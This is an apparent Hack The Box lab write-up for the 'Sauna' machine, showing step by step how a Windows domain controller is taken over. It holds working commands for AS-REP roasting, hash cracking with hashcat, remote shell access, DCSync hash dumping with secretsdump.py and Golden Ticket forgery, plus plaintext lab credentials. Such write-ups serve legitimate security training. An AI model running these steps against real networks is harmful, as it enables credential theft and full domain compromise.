HTB Writeup: Sauna

Beware of Loan Managers

Enumeration

nmap

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-07 07:05 IST
Nmap scan report for 10.129.95.180 (10.129.95.180)
Host is up (0.071s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-07-07 08:37:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: 7h00m00s
| smb2-time:
|   date: 2022-07-07T08:38:34
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.47 seconds
  1. The remote target is a Domain Controller for the domain EGOTISTICAL-BANK.LOCAL
  2. RPC is available.
  3. DC’s hostname is SAUNA. FQDN: SAUNA.EGOTISTICAL-BANK.LOCAL
  4. A web server is running on TCP/80

Website

  1. The website appears to be static.

  2. A list of team members available on /about.html

    Untitled

  3. Using the common corporate username policy () , a wordlist of valid usernames is created.

    FSmith
    SCoins
    SDriver
    HBear
    BTaylor
    SKerb
    

User Access

  1. A check for ASREP-Roastable user is performed using Get-NPUsers.py from Impacket suite.

    GetNPUsers.py -dc-ip $(cat ip.txt) -usersfile ./users.txt -format hashcat EGOTISTICAL-BANK.LOCAL/ -no-pass
    
  2. User FSmith is vulnerable to ASREP-Roast attack.

    Untitled

  3. The hash is cracked with hashcat

    .\hashcat.exe -m 18200 -a 0 Y:\Documents\HTB\Sauna\fsmith.hash -O G:\Wordlists\rockyou.txt
    

    Untitled

  4. The credentials are found to be EGOTISTICAL-BANK.LOCAL\FSmith:Thestrokes23

  5. A PS Session is obtained using Evil-WinRM.

    Untitled

Privilege Escalation

Enumeration

  1. winPEAS is executed to enumerate the target machine.

  2. Autologon credentials were found for the user EGOTISTICALBANK\svc_loanmanager

    Untitled

  3. The credentials are EGOTISTICALBANK\svc_loanmanager:Moneymakestheworldgoround!

  4. However, the username is different when queried with net user command. It turns out to be svc_loanmgr

  5. svc_loanmgr is member of Remote Management Users.

  6. The domain SID for the Remote Management Users group is S-1-5-21-2966785786-3096785034-1186376766-1108.

  7. Further enumeration with PowerView.ps1, reveals that this group has ExtendedRight on the domain controller.

    Untitled

Exploitation

  1. The ExtendedRight Active Directory right allows the user to perform DCSync on the domain controller and dump the hashes.

    secretsdump.py 'EGOTISTICALBANK/svc_loanmgr:Moneymakestheworldgoround!'@EGOTISTICALBANK.LOCAL -dc-ip $(cat ip.txt) -target-ip $(cat ip.txt)
    

    Untitled

  2. The NTML hash for Administrator for the domain controller is obtained. This can be used to achieve a powershell session as local Administrator on the Domain Controller.

  3. Other way can be to use the krbtgt hash and craft a Golden Ticket!

    # Generate a Golden Ticket for the user Administrator
    ticketer.py -nthash <krbtgt nthash> -domain EGOTISTICALBANK -domain-sid S-1-5-21-2966785786-3096785034-1186376766 Administrator
       
    export KRB5CCNAME=./Administrator.cc
       
    # Use PSExec to execute command as Administrator on Domain Controller
    psexec.py -k -no-pass -dc-ip $(cat ip.txt) 'EGOTISTICALBANK/Administrator'@SAUNA.EGOTISTICAL-BANK.LOCAL -target-ip $(cat ip.txt )
       
    

    Untitled

The target host and domain are completely compromised.

Avatar
Mayank Malik
CRTP | Incident Responder | Synack Red Team Member | Threat Analyst | Security Researcher | Cloud/Network Architect

Mayank Malik is a tech savvy person, Red Team Enthusiast, and likes to wander around to learn new stuff. Cryptography, Networking and System Administrations are his forte. He’s one of the Founding Members for CTF Team, Abs0lut3Pwn4g3, and Core Member at DC 91120 (DEFCON Community Group). Apart from the mentioned skills, he’s good at communication skills and is goal oriented person. Yellow belt holder at pwn.college in pursue of learning and achieving Blue Belt.

Related